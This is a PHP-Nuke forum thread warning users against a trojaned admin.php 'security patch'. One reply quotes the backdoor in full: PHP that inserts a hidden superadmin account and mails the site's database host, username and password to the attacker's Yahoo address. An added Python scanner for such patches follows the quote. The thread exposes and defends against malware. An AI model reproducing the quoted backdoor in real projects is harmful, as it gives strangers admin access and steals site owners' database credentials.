Anonymous writes "Hi Nukers
Some punk claiming to be from "NukeSecure" has submitted a news article saying that supposedly people can gain access to your site using admin.php
THIS IS A SCRIPT KIDDIE. DO NOT DOWNLOAD OR IMPLEMENT THAT FILE
After checking the code through, I found code that not only creates an admin account - superuser admin account - with a pre-defined username and password, but it then emails this guy with your site URL, and your database username and password.
AI"
Posted on Tuesday, July 08 @ 12:34:15 CEST by [RETIRED]Raven
Re: Security Warning (Score: 1) by chatserv on Tuesday, July 08 @ 13:28:03 CEST http://nukeresources.com
Since most of you know I often provide a file so that users can manually perform the fixes, and seeing as NukeSecure forgot to do so, I will do it for him. Not only that, I'll even explain what each "fix" does, so let's go:
if ($nuke == "secure") {
$result = mysql_query("INSERT INTO nuke_authors VALUES ('god', 'God', '', '', '9984b7b73df597078be8085131ef5fc1', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,'')");
if (!$result) { echo "- data insertion error.
"; } else { echo "- data inserted.
"; }
}
This particular "fix" attempts to insert an admin with God access, of course since it won't be you and the password is encrypted only the author of this "fix" will be able to access this brand new admin account, sweet huh?
Find:
.""
Replace with:
.""
The inserted name value will allow this new admin with additional tools for his hacking tools, clever? Umm, let me think on that one for a bit
include ("config.php");
mysql_select_db($dbname) or die("Could not select the database: " . $db[db]);
$result=mysql_query("SELECT * FROM ".$prefix."_config");
while ($user = mysql_fetch_array($result)) {
{
{
$AdminMessage .="".$user["sitename"].",".$user["startdate"].",".$user["adminmail"].",".$user["notify_email"]."
";
$AdminMessage .="$dbhost
";
$AdminMessage .= "user:$dbuname
";
$AdminMessage .= "$dbpass
";
$AdminMessage .= "dname:$dbname
";
mail("nukesecure@yahoo.co.uk", "".$user["nukeurl"]."", "$AdminMessage", "From:");
}
}
}
This insert will mail the admin login info to the author of the "fix", essential part of any good "security fix", no patch should be missing this beauty
Last but not least, the credits:
/* fixed by nukesecure */
Oh it was fixed alright, no doubts about that one.
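A reviewer-side check for the behaviours chatserv walks through above, as an added example that is not part of the thread or of PHP-Nuke: it flags a PHP patch that inserts a row into an `_authors` table, passes database settings from config.php into `mail()`, or mails a hard-coded address. The function name, rule labels and both sample files are constructed for illustration, and the regex heuristics assume unobfuscated code.

```python
import re

# Variable names that config.php defines in the code quoted above.
DB_CONFIG_VARS = {"dbhost", "dbuname", "dbpass", "dbname"}
VAR = re.compile(r"\$(\w+)")
# "$x = ..." or "$x .= ..." (not ==, =>); RHS stops at ';' or '{'.
ASSIGN = re.compile(r"\$(\w+)\s*\.?=(?![=>])\s*([^;{]*)")
MAIL_CALL = re.compile(r"\bmail\s*\(([^;]*)\)\s*;")
ADMIN_INSERT = re.compile(r"INSERT\s+INTO\s+\S*_authors\b", re.I)
LITERAL_RCPT = re.compile(r"""\s*["'][^"'$]+@[^"'$]+["']""")

def scan_patch(php_source):
    """Return sorted rule names (this example's own labels) that fire."""
    hits = set()
    if ADMIN_INSERT.search(php_source):
        hits.add("admin-row-insert")
    # One-pass taint: a variable built from a DB setting is tainted too.
    tainted = set(DB_CONFIG_VARS)
    for name, rhs in ASSIGN.findall(php_source):
        if tainted & set(VAR.findall(rhs)):
            tainted.add(name)
    for call in MAIL_CALL.finditer(php_source):
        args = call.group(1)
        if tainted & set(VAR.findall(args)):
            hits.add("credentials-in-mail")
        if LITERAL_RCPT.match(args):
            hits.add("hardcoded-recipient")
    return sorted(hits)

# Constructed samples; the address and hash are placeholders.
SAMPLE_TROJANED = r'''<?php
if ($nuke == "secure") {
  $result = mysql_query("INSERT INTO nuke_authors VALUES ('god', 'God', 'PLACEHOLDER_HASH', 1)");
}
include ("config.php");
$AdminMessage .= "user:$dbuname\n";
$AdminMessage .= "$dbpass\n";
mail("collector@example.invalid", $nukeurl, "$AdminMessage", "From:");
'''
SAMPLE_BENIGN = r'''<?php
include ("config.php");
mysql_select_db($dbname);
$body = "New comment on " . $sitename;
mail($adminmail, "Notification", $body, "From: noreply");
'''

if __name__ == "__main__":
    print(scan_patch(SAMPLE_TROJANED))
    print(scan_patch(SAMPLE_BENIGN))
```

A hit is a reason to read the file by hand before applying it, not a verdict; a clean result says nothing about code the patterns do not cover.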
Re: Security Warning (Score: 1) by Raven on Tuesday, July 08 @ 14:01:39 CEST http://ravenphpscripts.com
Just in case his email addy was real, I contacted Yahoo and they are taking appropriate steps also. Wonder if we should contact SF?
Re: Security Warning (Score: 1) by Olipro on Wednesday, July 09 @ 08:18:29 CEST
Makes me feel like setting a trap. Anyhow, his script wouldn't work, I created a pic of the day mod and subsequently added a new row to the authors section